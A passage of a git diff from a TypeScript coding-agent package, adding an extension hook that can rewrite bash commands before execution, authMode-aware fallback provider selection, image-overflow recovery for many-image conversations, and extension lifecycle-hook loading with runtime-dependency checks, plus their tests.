LifecycleHookMap; } /** Result of loading extensions. */ diff --git a/packages/pi-coding-agent/src/core/extensions/wrapper.ts b/packages/pi-coding-agent/src/core/extensions/wrapper.ts index b8d050dfc..d328f7610 100644 --- a/packages/pi-coding-agent/src/core/extensions/wrapper.ts +++ b/packages/pi-coding-agent/src/core/extensions/wrapper.ts @@ -44,6 +44,15 @@ export function wrapToolWithExtensions(tool: AgentTool, runner: Exten signal?: AbortSignal, onUpdate?: AgentToolUpdateCallback, ) => { + // For bash tool calls, let extensions transform the command before execution + if (tool.name === "bash" && runner.hasHandlers("bash_transform")) { + const input = params as { command?: string; cwd?: string }; + if (typeof input.command === "string") { + const transformed = await runner.emitBashTransform(input.command, input.cwd ?? ""); + params = { ...params, command: transformed }; + } + } + // Emit tool_call event - extensions can block execution if (runner.hasHandlers("tool_call")) { try { diff --git a/packages/pi-coding-agent/src/core/fallback-resolver.test.ts b/packages/pi-coding-agent/src/core/fallback-resolver.test.ts index c62f5d473..f454d1c8e 100644 --- a/packages/pi-coding-agent/src/core/fallback-resolver.test.ts +++ b/packages/pi-coding-agent/src/core/fallback-resolver.test.ts @@ -38,6 +38,7 @@ function createResolver(overrides?: { enabled?: boolean; isProviderAvailable?: (provider: string) => boolean; hasAuth?: (provider: string) => boolean; + isProviderRequestReady?: (provider: string) => boolean; find?: (provider: string, modelId: string) => Model | undefined; }) { const settingsManager = { @@ -60,6 +61,7 @@ function createResolver(overrides?: { if (provider === "openai" && modelId === "gpt-4.1") return openaiModel; return undefined; }), + isProviderRequestReady: overrides?.isProviderRequestReady ?? overrides?.hasAuth ?? (() => true), } as unknown as ModelRegistry; return { resolver: new FallbackResolver(settingsManager, authStorage, modelRegistry), authStorage }; @@ -122,9 +124,9 @@ describe("FallbackResolver — findFallback", () => { assert.equal(result, null); }); - it("skips providers without auth", async () => { + it("skips providers that are not request-ready", async () => { const { resolver } = createResolver({ - hasAuth: (provider: string) => provider !== "alibaba", + isProviderRequestReady: (provider: string) => provider !== "alibaba", }); const result = await resolver.findFallback(zaiModel, "quota_exhausted"); @@ -133,6 +135,17 @@ describe("FallbackResolver — findFallback", () => { assert.equal(result!.model.provider, "openai"); }); + it("allows fallback to external-cli style providers without stored auth", async () => { + const { resolver } = createResolver({ + hasAuth: () => false, + isProviderRequestReady: (provider: string) => provider === "alibaba", + }); + + const result = await resolver.findFallback(zaiModel, "quota_exhausted"); + assert.notEqual(result, null); + assert.equal(result!.model.provider, "alibaba"); + }); + it("skips providers with no model in registry", async () => { const { resolver } = createResolver({ find: (provider: string, modelId: string) => { diff --git a/packages/pi-coding-agent/src/core/fallback-resolver.ts b/packages/pi-coding-agent/src/core/fallback-resolver.ts index 5d6b61499..e390f2038 100644 --- a/packages/pi-coding-agent/src/core/fallback-resolver.ts +++ b/packages/pi-coding-agent/src/core/fallback-resolver.ts @@ -149,9 +149,8 @@ export class FallbackResolver { const model = this.modelRegistry.find(entry.provider, entry.model); if (!model) continue; - // Check if API key is available - const hasAuth = this.authStorage.hasAuth(entry.provider); - if (!hasAuth) continue; + // Check if provider is request-ready for fallback (authMode-aware) + if (!this.modelRegistry.isProviderRequestReady(entry.provider)) continue; return { model, diff --git a/packages/pi-coding-agent/src/core/fs-utils.test.ts b/packages/pi-coding-agent/src/core/fs-utils.test.ts index 997080e4c..6c20beba1 100644 --- a/packages/pi-coding-agent/src/core/fs-utils.test.ts +++ b/packages/pi-coding-agent/src/core/fs-utils.test.ts @@ -1,66 +1,54 @@ import assert from "node:assert/strict"; -import { describe, it } from "node:test"; +import { describe, it, afterEach } from "node:test"; import { mkdtempSync, readFileSync, rmSync, existsSync } from "node:fs"; import { join } from "node:path"; import { tmpdir } from "node:os"; import { atomicWriteFileSync } from "./fs-utils.js"; describe("atomicWriteFileSync", () => { - it("writes file content atomically", () => { - const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); - try { - const filePath = join(dir, "test.txt"); - atomicWriteFileSync(filePath, "hello world"); - assert.equal(readFileSync(filePath, "utf-8"), "hello world"); - } finally { + let dir: string; + + afterEach(() => { + if (dir) { rmSync(dir, { recursive: true, force: true }); } }); + it("writes file content atomically", () => { + dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); + const filePath = join(dir, "test.txt"); + atomicWriteFileSync(filePath, "hello world"); + assert.equal(readFileSync(filePath, "utf-8"), "hello world"); + }); + it("overwrites existing file atomically", () => { - const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); - try { - const filePath = join(dir, "test.txt"); - atomicWriteFileSync(filePath, "first"); - atomicWriteFileSync(filePath, "second"); - assert.equal(readFileSync(filePath, "utf-8"), "second"); - } finally { - rmSync(dir, { recursive: true, force: true }); - } + dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); + const filePath = join(dir, "test.txt"); + atomicWriteFileSync(filePath, "first"); + atomicWriteFileSync(filePath, "second"); + assert.equal(readFileSync(filePath, "utf-8"), "second"); }); it("does not leave .tmp file after successful write", () => { - const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); - try { - const filePath = join(dir, "test.txt"); - atomicWriteFileSync(filePath, "content"); - assert.equal(existsSync(filePath + ".tmp"), false); - } finally { - rmSync(dir, { recursive: true, force: true }); - } + dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); + const filePath = join(dir, "test.txt"); + atomicWriteFileSync(filePath, "content"); + assert.equal(existsSync(filePath + ".tmp"), false); }); it("supports Buffer content", () => { - const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); - try { - const filePath = join(dir, "test.bin"); - const buf = Buffer.from([0x00, 0x01, 0x02, 0xff]); - atomicWriteFileSync(filePath, buf); - const result = readFileSync(filePath); - assert.deepEqual(result, buf); - } finally { - rmSync(dir, { recursive: true, force: true }); - } + dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); + const filePath = join(dir, "test.bin"); + const buf = Buffer.from([0x00, 0x01, 0x02, 0xff]); + atomicWriteFileSync(filePath, buf); + const result = readFileSync(filePath); + assert.deepEqual(result, buf); }); it("supports encoding parameter", () => { - const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); - try { - const filePath = join(dir, "test.txt"); - atomicWriteFileSync(filePath, "utf8 content", "utf-8"); - assert.equal(readFileSync(filePath, "utf-8"), "utf8 content"); - } finally { - rmSync(dir, { recursive: true, force: true }); - } + dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); + const filePath = join(dir, "test.txt"); + atomicWriteFileSync(filePath, "utf8 content", "utf-8"); + assert.equal(readFileSync(filePath, "utf-8"), "utf8 content"); }); }); diff --git a/packages/pi-coding-agent/src/core/image-overflow-recovery.test.ts b/packages/pi-coding-agent/src/core/image-overflow-recovery.test.ts new file mode 100644 index 000000000..de075c280 --- /dev/null +++ b/packages/pi-coding-agent/src/core/image-overflow-recovery.test.ts @@ -0,0 +1,228 @@ +import assert from "node:assert/strict"; +import { describe, it } from "node:test"; +import { + isImageDimensionError, + MANY_IMAGE_MAX_DIMENSION, + downsizeConversationImages, +} from "./image-overflow-recovery.js"; +import type { Message } from "@gsd/pi-ai"; + +// ─── isImageDimensionError ──────────────────────────────────────────────────── + +describe("isImageDimensionError", () => { + it("returns true for Anthropic many-image dimension error", () => { + const errorMessage = + 'Error: 400 {"type":"error","error":{"type":"invalid_request_error","message":"messages.125.content.38.image.source.base64.data: At least one of the image dimensions exceed max allowed size for many-image requests: 2000 pixels"}}'; + assert.equal(isImageDimensionError(errorMessage), true); + }); + + it("returns true for bare dimension exceed message", () => { + const errorMessage = + "image dimensions exceed max allowed size for many-image requests: 2000 pixels"; + assert.equal(isImageDimensionError(errorMessage), true); + }); + + it("returns false for unrelated 400 error", () => { + const errorMessage = + 'Error: 400 {"type":"error","error":{"type":"invalid_request_error","message":"max_tokens: 4096 > 2048"}}'; + assert.equal(isImageDimensionError(errorMessage), false); + }); + + it("returns false for rate limit error", () => { + assert.equal(isImageDimensionError("429 rate limit exceeded"), false); + }); + + it("returns false for empty string", () => { + assert.equal(isImageDimensionError(""), false); + }); + + it("returns false for undefined", () => { + assert.equal(isImageDimensionError(undefined), false); + }); +}); + +// ─── MANY_IMAGE_MAX_DIMENSION ───────────────────────────────────────────────── + +describe("MANY_IMAGE_MAX_DIMENSION", () => { + it("is less than 2000 (the API-enforced limit)", () => { + assert.ok(MANY_IMAGE_MAX_DIMENSION < 2000); + }); + + it("is a positive integer", () => { + assert.ok(MANY_IMAGE_MAX_DIMENSION > 0); + assert.equal(MANY_IMAGE_MAX_DIMENSION, Math.floor(MANY_IMAGE_MAX_DIMENSION)); + }); +}); + +// ─── helpers ────────────────────────────────────────────────────────────────── + +function makeUserMsg(content: Message["content"] & any): Message { + return { role: "user", content, timestamp: Date.now() } as Message; +} + +function makeAssistantMsg(text: string): Message { + return { + role: "assistant", + content: [{ type: "text", text }], + api: "anthropic-messages", + provider: "anthropic", + model: "claude-opus-4-6", + usage: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, totalTokens: 0, cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 } }, + stopReason: "stop", + timestamp: Date.now(), + } as Message; +} + +function makeToolResultMsg(images: number): Message { + const content: any[] = []; + for (let i = 0; i < images; i++) { + content.push({ type: "image", data: `img${i}`, mimeType: "image/png" }); + } + return { + role: "toolResult", + toolCallId: `tc${Math.random()}`, + toolName: "screenshot", + content, + isError: false, + timestamp: Date.now(), + } as Message; +} + +// ─── downsizeConversationImages ─────────────────────────────────────────────── + +describe("downsizeConversationImages", () => { + it("counts images in user and toolResult messages", () => { + const messages: Message[] = [ + makeUserMsg([ + { type: "image", data: "img1", mimeType: "image/png" }, + { type: "image", data: "img2", mimeType: "image/png" }, + ]), + makeAssistantMsg("I see them"), + makeToolResultMsg(1), + ]; + + const result = downsizeConversationImages(messages); + assert.equal(result.imageCount, 3); + }); + + it("returns processed=false when no images present", () => { + const messages: Message[] = [ + makeUserMsg("just text"), + makeAssistantMsg("reply"), + ]; + + const result = downsizeConversationImages(messages); + assert.equal(result.imageCount, 0); + assert.equal(result.processed, false); + }); + + it("returns processed=false when image count <= RECENT_IMAGES_TO_KEEP", () => { + const messages: Message[] = [ + makeUserMsg([ + { type: "image", data: "img1", mimeType: "image/png" }, + ]), + makeAssistantMsg("got it"), + ]; + + const result = downsizeConversationImages(messages); + assert.equal(result.imageCount, 1); + assert.equal(result.processed, false); + }); + + it("strips older images when many images present, preserves recent ones", () => { + const messages: Message[] = []; + for (let i = 0; i < 25; i++) { + messages.push( + makeUserMsg([ + { type: "text", text: `message ${i}` }, + { type: "image", data: `img${i}`, mimeType: "image/png" }, + ]), + ); + messages.push(makeAssistantMsg(`reply ${i}`)); + } + + const result = downsizeConversationImages(messages); + assert.ok(result.processed); + assert.equal(result.imageCount, 25); + assert.equal(result.strippedCount, 20); // 25 - 5 recent + + // Count remaining images + let remainingImages = 0; + for (const msg of messages) { + if (msg.role === "assistant") continue; + if (typeof msg.content === "string") continue; + const arr = msg.content as any[]; + for (const block of arr) { + if (block.type === "image") remainingImages++; + } + } + assert.equal(remainingImages, 5, "Should keep exactly 5 most recent images"); + + // The 5 most recent user messages (indices 40,42,44,46,48) should have images + for (let i = 20; i < 25; i++) { + const userMsg = messages[i * 2]; // user messages at even indices + const arr = userMsg.content as any[]; + const hasImage = arr.some((c: any) => c.type === "image"); + assert.ok(hasImage, `Recent message ${i} should retain its image`); + } + }); + + it("adds text placeholder when stripping an image", () => { + const messages: Message[] = []; + for (let i = 0; i < 10; i++) { + messages.push( + makeUserMsg([ + { type: "image", data: `img${i}`, mimeType: "image/jpeg" }, + ]), + ); + messages.push(makeAssistantMsg(`reply ${i}`)); + } + + downsizeConversationImages(messages); + + // First message's image should have been replaced with text + const firstMsg = messages[0]; + const arr = firstMsg.content as any[]; + const placeholder = arr.find( + (c: any) => c.type === "text" && c.text.includes("[image removed"), + ); + assert.ok(placeholder, "Stripped image should be replaced with text placeholder"); + assert.ok( + placeholder.text.includes("image/jpeg"), + "Placeholder should mention original mime type", + ); + }); + + it("handles toolResult messages with images", () => { + const messages: Message[] = []; + for (let i = 0; i < 10; i++) { + messages.push(makeToolResultMsg(1)); + messages.push(makeAssistantMsg(`reply ${i}`)); + } + + const result = downsizeConversationImages(messages); + assert.equal(result.imageCount, 10); + assert.equal(result.strippedCount, 5); + assert.ok(result.processed); + }); + + it("handles mixed user and toolResult images", () => { + const messages: Message[] = []; + for (let i = 0; i < 8; i++) { + messages.push( + makeUserMsg([ + { type: "text", text: `check ${i}` }, + { type: "image", data: `uimg${i}`, mimeType: "image/png" }, + ]), + ); + messages.push(makeAssistantMsg(`processing ${i}`)); + messages.push(makeToolResultMsg(1)); + messages.push(makeAssistantMsg(`done ${i}`)); + } + + const result = downsizeConversationImages(messages); + // 8 user images + 8 tool result images = 16 total + assert.equal(result.imageCount, 16); + assert.equal(result.strippedCount, 11); // 16 - 5 recent + }); +}); diff --git a/packages/pi-coding-agent/src/core/image-overflow-recovery.ts b/packages/pi-coding-agent/src/core/image-overflow-recovery.ts new file mode 100644 index 000000000..3573514e4 --- /dev/null +++ b/packages/pi-coding-agent/src/core/image-overflow-recovery.ts @@ -0,0 +1,118 @@ +/** + * Image overflow recovery for many-image sessions. + * + * When a conversation accumulates many images (screenshots, file reads, etc.), + * the Anthropic API enforces a stricter per-image dimension limit (2000px) for + * "many-image requests." This module detects the resulting 400 error and + * recovers by stripping older images from the conversation history, preserving + * the most recent ones to maintain session continuity. + * + * @see https://github.com/gsd-build/gsd-2/issues/2874 + */ + +import type { Message, ImageContent, TextContent } from "@gsd/pi-ai"; + +/** + * Maximum image dimension (px) that the Anthropic API allows in many-image + * requests. Images at or above this size in a large conversation will be + * rejected with a 400 error. We use 1568 as the safe ceiling (Anthropic's + * recommended max for multi-image requests). + */ +export const MANY_IMAGE_MAX_DIMENSION = 1568; + +/** + * Number of recent images to preserve when stripping old images. + * Keeps the most recent screenshots/images so the model retains visual context + * for the current task. + */ +const RECENT_IMAGES_TO_KEEP = 5; + +/** + * Regex matching the Anthropic API error for oversized images in many-image requests. + */ +const IMAGE_DIMENSION_ERROR_RE = + /image.dimensions?.exceed.*max.*allowed.*size.*many.image/i; + +/** + * Detect whether an error message is the Anthropic "image dimensions exceed max + * allowed size for many-image requests" 400 error. + */ +export function isImageDimensionError(errorMessage: string | undefined | null): boolean { + if (!errorMessage) return false; + return IMAGE_DIMENSION_ERROR_RE.test(errorMessage); +} + +export interface DownsizeResult { + /** Total number of images found in the conversation */ + imageCount: number; + /** Whether any images were stripped */ + processed: boolean; + /** Number of images that were stripped */ + strippedCount: number; +} + +/** + * Strip older images from conversation messages to recover from many-image + * dimension errors. Preserves the N most recent images and replaces older ones + * with a text placeholder. + * + * Mutates messages in place (same pattern as replaceMessages/compaction). + * + * Accepts Message[] (the LLM message union) so it works with both + * agent.state.messages and session entries. + */ +export function downsizeConversationImages(messages: Message[]): DownsizeResult { + // First pass: collect all image locations (message index + content index) + const imageLocations: Array<{ msgIdx: number; contentIdx: number }> = []; + + for (let msgIdx = 0; msgIdx < messages.length; msgIdx++) { + const msg = messages[msgIdx]; + if (msg.role === "assistant") continue; + + // UserMessage can have string content; ToolResultMessage always has array + if (msg.role === "user" && typeof msg.content === "string") continue; + + const contentArr = msg.content as (TextContent | ImageContent)[]; + if (!Array.isArray(contentArr)) continue; + + for (let contentIdx = 0; contentIdx < contentArr.length; contentIdx++) { + if (contentArr[contentIdx].type === "image") { + imageLocations.push({ msgIdx, contentIdx }); + } + } + } + + const imageCount = imageLocations.length; + if (imageCount === 0) { + return { imageCount: 0, processed: false, strippedCount: 0 }; + } + + // Determine which images to strip (all except the N most recent) + const stripCount = Math.max(0, imageCount - RECENT_IMAGES_TO_KEEP); + if (stripCount === 0) { + return { imageCount, processed: false, strippedCount: 0 }; + } + + const toStrip = imageLocations.slice(0, stripCount); + + // Second pass: replace stripped images with text placeholder. + // Process in reverse order to maintain content indices. + for (let i = toStrip.length - 1; i >= 0; i--) { + const { msgIdx, contentIdx } = toStrip[i]; + const msg = messages[msgIdx]; + if (msg.role === "assistant") continue; + if (msg.role === "user" && typeof msg.content === "string") continue; + + const contentArr = msg.content as (TextContent | ImageContent)[]; + const imageBlock = contentArr[contentIdx] as ImageContent; + const mimeType = imageBlock.mimeType || "image/unknown"; + + // Replace the image block with a text placeholder + (contentArr as any[])[contentIdx] = { + type: "text", + text: `[image removed to reduce context size — was ${mimeType}]`, + } as TextContent; + } + + return { imageCount, processed: true, strippedCount: stripCount }; +} diff --git a/packages/pi-coding-agent/src/core/index.ts b/packages/pi-coding-agent/src/core/index.ts index 10c6f1753..5dd346548 100644 --- a/packages/pi-coding-agent/src/core/index.ts +++ b/packages/pi-coding-agent/src/core/index.ts @@ -29,6 +29,7 @@ export { type ExecResult, type Extension, type ExtensionAPI, + type ExtensionManifest, type ExtensionCommandContext, type ExtensionContext, type ExtensionError, @@ -53,6 +54,11 @@ export { type SessionSwitchEvent, type SessionTreeEvent, type ToolCallEvent, + readManifest, + readManifestFromEntryPath, + type SortResult, + type SortWarning, + sortExtensionPaths, type ToolDefinition, type ToolRenderResultOptions, type ToolResultEvent, diff --git a/packages/pi-coding-agent/src/core/lifecycle-hooks.test.ts b/packages/pi-coding-agent/src/core/lifecycle-hooks.test.ts new file mode 100644 index 000000000..d19c87d16 --- /dev/null +++ b/packages/pi-coding-agent/src/core/lifecycle-hooks.test.ts @@ -0,0 +1,227 @@ +import assert from "node:assert/strict"; +import { mkdtempSync, mkdirSync, rmSync, writeFileSync, existsSync } from "node:fs"; +import { homedir, tmpdir } from "node:os"; +import { join, resolve } from "node:path"; +import { describe, it } from "node:test"; +import { + readManifestRuntimeDeps, + collectRuntimeDependencies, + verifyRuntimeDependencies, + resolveLocalSourcePath, +} from "./lifecycle-hooks.js"; + +function tmpDir(prefix: string, t: { after: (fn: () => void) => void }): string { + const dir = mkdtempSync(join(tmpdir(), `pi-lh-${prefix}-`)); + t.after(() => rmSync(dir, { recursive: true, force: true })); + return dir; +} + +// ─── readManifestRuntimeDeps ────────────────────────────────────────────────── + +describe("readManifestRuntimeDeps", () => { + it("returns empty array when manifest file is missing", (t) => { + const dir = tmpDir("no-manifest", t); + assert.deepEqual(readManifestRuntimeDeps(dir), []); + }); + + it("returns empty array for malformed JSON", (t) => { + const dir = tmpDir("bad-json", t); + writeFileSync(join(dir, "extension-manifest.json"), "not json{{{", "utf-8"); + assert.deepEqual(readManifestRuntimeDeps(dir), []); + }); + + it("returns runtime deps from valid manifest", (t) => { + const dir = tmpDir("valid", t); + writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify({ + dependencies: { runtime: ["claude", "node"] }, + }), "utf-8"); + assert.deepEqual(readManifestRuntimeDeps(dir), ["claude", "node"]); + }); + + it("returns empty array when dependencies exists but runtime is missing", (t) => { + const dir = tmpDir("no-runtime", t); + writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify({ + dependencies: {}, + }), "utf-8"); + assert.deepEqual(readManifestRuntimeDeps(dir), []); + }); + + it("returns empty array when runtime is empty", (t) => { + const dir = tmpDir("empty-runtime", t); + writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify({ + dependencies: { runtime: [] }, + }), "utf-8"); + assert.deepEqual(readManifestRuntimeDeps(dir), []); + }); + + it("filters out non-string entries in runtime array", (t) => { + const dir = tmpDir("mixed-types", t); + writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify({ + dependencies: { runtime: [123, null, "node", false, "python"] }, + }), "utf-8"); + assert.deepEqual(readManifestRuntimeDeps(dir), ["node", "python"]); + }); + + it("returns empty array when no dependencies field at all", (t) => { + const dir = tmpDir("no-deps-field", t); + writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify({ + id: "test", + name: "Test", + }), "utf-8"); + assert.deepEqual(readManifestRuntimeDeps(dir), []); + }); +}); + +// ─── collectRuntimeDependencies ─────────────────────────────────────────────── + +describe("collectRuntimeDependencies", () => { + it("aggregates deps from installedPath manifest", (t) => { + const dir = tmpDir("collect-installed", t); + writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify({ + dependencies: { runtime: ["claude"] }, + }), "utf-8"); + assert.deepEqual(collectRuntimeDependencies(dir, []), ["claude"]); + }); + + it("aggregates deps from entry path directory manifests", (t) => { + const root = tmpDir("collect-entry", t); + const installedDir = join(root, "installed"); + const entryDir = join(root, "entry"); + mkdirSync(installedDir, { recursive: true }); + mkdirSync(entryDir, { recursive: true }); + writeFileSync(join(entryDir, "extension-manifest.json"), JSON.stringify({ + dependencies: { runtime: ["python"] }, + }), "utf-8"); + const deps = collectRuntimeDependencies(installedDir, [join(entryDir, "index.ts")]); + assert.deepEqual(deps, ["python"]); + }); + + it("deduplicates across multiple directories", (t) => { + const root = tmpDir("collect-dedup", t); + const dir1 = join(root, "dir1"); + const dir2 = join(root, "dir2"); + mkdirSync(dir1, { recursive: true }); + mkdirSync(dir2, { recursive: true }); + writeFileSync(join(dir1, "extension-manifest.json"), JSON.stringify({ + dependencies: { runtime: ["node", "python"] }, + }), "utf-8"); + writeFileSync(join(dir2, "extension-manifest.json"), JSON.stringify({ + dependencies: { runtime: ["python", "claude"] }, + }), "utf-8"); + const deps = collectRuntimeDependencies(dir1, [join(dir2, "index.ts")]); + assert.equal(deps.length, 3); + assert.ok(deps.includes("node")); + assert.ok(deps.includes("python")); + assert.ok(deps.includes("claude")); + }); + + it("returns empty when no directories have manifests", (t) => { + const dir = tmpDir("collect-empty", t); + assert.deepEqual(collectRuntimeDependencies(dir, []), []); + }); +}); + +// ─── verifyRuntimeDependencies ──────────────────────────────────────────────── + +describe("verifyRuntimeDependencies", () => { + it("does not throw for empty deps array", () => { + assert.doesNotThrow(() => verifyRuntimeDependencies([], "test-source", "pi")); + }); + + it("does not throw when all deps are present", () => { + assert.doesNotThrow(() => verifyRuntimeDependencies(["node"], "test-source", "pi")); + }); + + it("throws for missing dep with 'Missing runtime dependencies' message", () => { + assert.throws( + () => verifyRuntimeDependencies(["__nonexistent_dep_for_test__"], "test-source", "pi"), + (err: Error) => { + assert.ok(err.message.includes("Missing runtime dependencies")); + assert.ok(err.message.includes("__nonexistent_dep_for_test__")); + return true; + }, + ); + }); + + it("lists all missing deps in error message", () => { + assert.throws( + () => verifyRuntimeDependencies(["__missing_1__", "__missing_2__"], "test-source", "pi"), + (err: Error) => { + assert.ok(err.message.includes("__missing_1__")); + assert.ok(err.message.includes("__missing_2__")); + return true; + }, + ); + }); + + it("includes appName and source in error for retry hint", () => { + assert.throws( + () => verifyRuntimeDependencies(["__missing__"], "github:user/repo", "gsd"), + (err: Error) => { + assert.ok(err.message.includes("gsd")); + assert.ok(err.message.includes("github:user/repo")); + return true; + }, + ); + }); +}); + +// ─── resolveLocalSourcePath ─────────────────────────────────────────────────── + +describe("resolveLocalSourcePath", () => { + it("returns undefined for empty string", () => { + assert.equal(resolveLocalSourcePath("", "/tmp"), undefined); + }); + + it("returns undefined for npm: source", () => { + assert.equal(resolveLocalSourcePath("npm:@foo/bar", "/tmp"), undefined); + }); + + it("returns undefined for git URL", () => { + assert.equal(resolveLocalSourcePath("git:github.com/user/repo", "/tmp"), undefined); + }); + + it("returns undefined for https git URL", () => { + assert.equal(resolveLocalSourcePath("https://github.com/user/repo", "/tmp"), undefined); + }); + + it("resolves ~ to homedir", () => { + const result = resolveLocalSourcePath("~", "/tmp"); + if (existsSync(homedir())) { + assert.equal(result, homedir()); + } else { + assert.equal(result, undefined); + } + }); + + it("resolves ~/path relative to homedir", () => { + const result = resolveLocalSourcePath("~/", "/tmp"); + if (existsSync(homedir())) { + assert.equal(result, homedir()); + } else { + assert.equal(result, undefined); + } + }); + + it("resolves relative path that exists", (t) => { + const dir = tmpDir("resolve-rel", t); + const sub = join(dir, "myext"); + mkdirSync(sub, { recursive: true }); + const result = resolveLocalSourcePath("myext", dir); + assert.equal(result, resolve(dir, "myext")); + }); + + it("returns undefined for relative path that does not exist", (t) => { + const dir = tmpDir("resolve-noexist", t); + assert.equal(resolveLocalSourcePath("nonexistent", dir), undefined); + }); + + it("resolves absolute path that exists", (t) => { + const dir = tmpDir("resolve-abs", t); + assert.equal(resolveLocalSourcePath(dir, "/irrelevant"), dir); + }); + + it("returns undefined for absolute path that does not exist", () => { + assert.equal(resolveLocalSourcePath("/tmp/__nonexistent_path_for_test__", "/tmp"), undefined); + }); +}); diff --git a/packages/pi-coding-agent/src/core/lifecycle-hooks.ts b/packages/pi-coding-agent/src/core/lifecycle-hooks.ts new file mode 100644 index 000000000..fa103ef79 --- /dev/null +++ b/packages/pi-coding-agent/src/core/lifecycle-hooks.ts @@ -0,0 +1,280 @@ +import { spawnSync } from "node:child_process"; +import { existsSync, readFileSync } from "node:fs"; +import { homedir } from "node:os"; +import { dirname, join, resolve } from "node:path"; +import { pathToFileURL } from "node:url"; +import { parseGitUrl } from "../utils/git.js"; +import { + importExtensionModule, + loadExtensions, + type LifecycleHookContext, + type LifecycleHookMap, + type LifecycleHookHandler, + type LifecycleHookPhase, + type LifecycleHookScope, +} from "./extensions/index.js"; +import type { DefaultPackageManager } from "./package-manager.js"; + +interface ExtensionManifest { + dependencies?: { + runtime?: string[]; + }; +} + +export interface PackageLifecycleHooksOptions { + source: string; + local: boolean; + cwd: string; + agentDir: string; + appName: string; + packageManager: DefaultPackageManager; + stdout: NodeJS.WriteStream; + stderr: NodeJS.WriteStream; +} + +export type LifecycleHooksTarget = "source" | "installed"; + +export interface PrepareLifecycleHooksOptions { + verifyRuntimeDependencies?: boolean; +} + +export interface LifecycleHooksRunResult { + phase: LifecycleHookPhase; + hooksRun: number; + hookErrors: number; + legacyHooksRun: number; + entryPathCount: number; + skipped: boolean; +} + +interface LoadedLifecycleHooks { + source: string; + scope: LifecycleHookScope; + installedPath?: string; + cwd: string; + stdout: NodeJS.WriteStream; + stderr: NodeJS.WriteStream; + entryPaths: string[]; + hooksByPath: Map; +} + +function toScope(local: boolean): LifecycleHookScope { + return local ? "project" : "user"; +} + +export function readManifestRuntimeDeps(dir: string): string[] { + const manifestPath = join(dir, "extension-manifest.json"); + if (!existsSync(manifestPath)) return []; + try { + const manifest = JSON.parse(readFileSync(manifestPath, "utf-8")) as ExtensionManifest; + return manifest.dependencies?.runtime?.filter((dep): dep is string => typeof dep === "string") ?? []; + } catch { + return []; + } +} + +export function collectRuntimeDependencies(installedPath: string, entryPaths: string[]): string[] { + const deps = new Set(); + const candidateDirs = new Set([installedPath, ...entryPaths.map((entryPath) => dirname(entryPath))]); + for (const dir of candidateDirs) { + for (const dep of readManifestRuntimeDeps(dir)) { + deps.add(dep); + } + } + return Array.from(deps); +} + +export function verifyRuntimeDependencies(runtimeDeps: string[], source: string, appName: string): void { + const missing: string[] = []; + for (const dep of runtimeDeps) { + const result = spawnSync(dep, ["--version"], { encoding: "utf-8", timeout: 5000 }); + if (result.error || result.status !== 0) { + missing.push(dep); + } + } + if (missing.length === 0) return; + throw new Error( + `Missing runtime dependencies: ${missing.join(", ")}.\n` + + `Install them and retry: ${appName} install ${source}`, + ); +} + +export function resolveLocalSourcePath(source: string, cwd: string): string | undefined { + const trimmed = source.trim(); + if (!trimmed) return undefined; + if (trimmed.startsWith("npm:")) return undefined; + if (parseGitUrl(trimmed)) return undefined; + + let normalized = trimmed; + if (normalized === "~") { + normalized = homedir(); + } else if (normalized.startsWith("~/")) { + normalized = join(homedir(), normalized.slice(2)); + } + + const absolutePath = resolve(cwd, normalized); + return existsSync(absolutePath) ? absolutePath : undefined; +} + +async function resolveEntryPathsFromTarget( + options: PackageLifecycleHooksOptions, + target: LifecycleHooksTarget, + scope: LifecycleHookScope, +): Promise<{ entryPaths: string[]; installedPath?: string }> { + if (target === "source") { + const localSourcePath = resolveLocalSourcePath(options.source, options.cwd); + if (!localSourcePath) return { entryPaths: [] }; + const resolved = await options.packageManager.resolveExtensionSources([localSourcePath], { local: true }); + const entryPaths = resolved.extensions.filter((resource) => resource.enabled).map((resource) => resource.path); + return { entryPaths, installedPath: localSourcePath }; + } + + const installedPath = options.packageManager.getInstalledPath(options.source, scope); + if (!installedPath) return { entryPaths: [] }; + const resolved = await options.packageManager.resolveExtensionSources([installedPath], { local: true }); + const entryPaths = resolved.extensions.filter((resource) => resource.enabled).map((resource) => resource.path); + return { entryPaths, installedPath }; +} + +export async function prepareLifecycleHooks( + options: PackageLifecycleHooksOptions, + target: LifecycleHooksTarget, + prepareOptions?: PrepareLifecycleHooksOptions, +): Promise { + const scope = toScope(options.local); + const { entryPaths, installedPath } = await resolveEntryPathsFromTarget(options, target, scope); + if (entryPaths.length === 0) { + return null; + } + + if (prepareOptions?.verifyRuntimeDependencies && installedPath) { + const runtimeDeps = collectRuntimeDependencies(installedPath, entryPaths); + verifyRuntimeDependencies(runtimeDeps, options.source, options.appName); + } + + const loaded = await loadExtensions(entryPaths, options.cwd); + for (const { path, error } of loaded.errors) { + options.stderr.write(`[lifecycle-hooks] Failed to load extension "${path}": ${error}\n`); + } + + const hooksByPath = new Map(); + for (const extension of loaded.extensions) { + hooksByPath.set(extension.path, extension.lifecycleHooks); + } + + return { + source: options.source, + scope, + installedPath, + cwd: options.cwd, + stdout: options.stdout, + stderr: options.stderr, + entryPaths, + hooksByPath, + }; +} + +async function runHookSafe( + hook: LifecycleHookHandler, + context: LifecycleHookContext, + stderr: NodeJS.WriteStream, +): Promise { + try { + await hook(context); + return true; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + stderr.write(`[lifecycle-hooks:${context.phase}] Hook failed: ${message}\n`); + return false; + } +} + +function getLegacyExportCandidates(phase: LifecycleHookPhase): string[] { + return [phase]; +} + +const _legacyModuleCache = new Map>(); + +async function runLegacyExportHook( + entryPath: string, + phase: 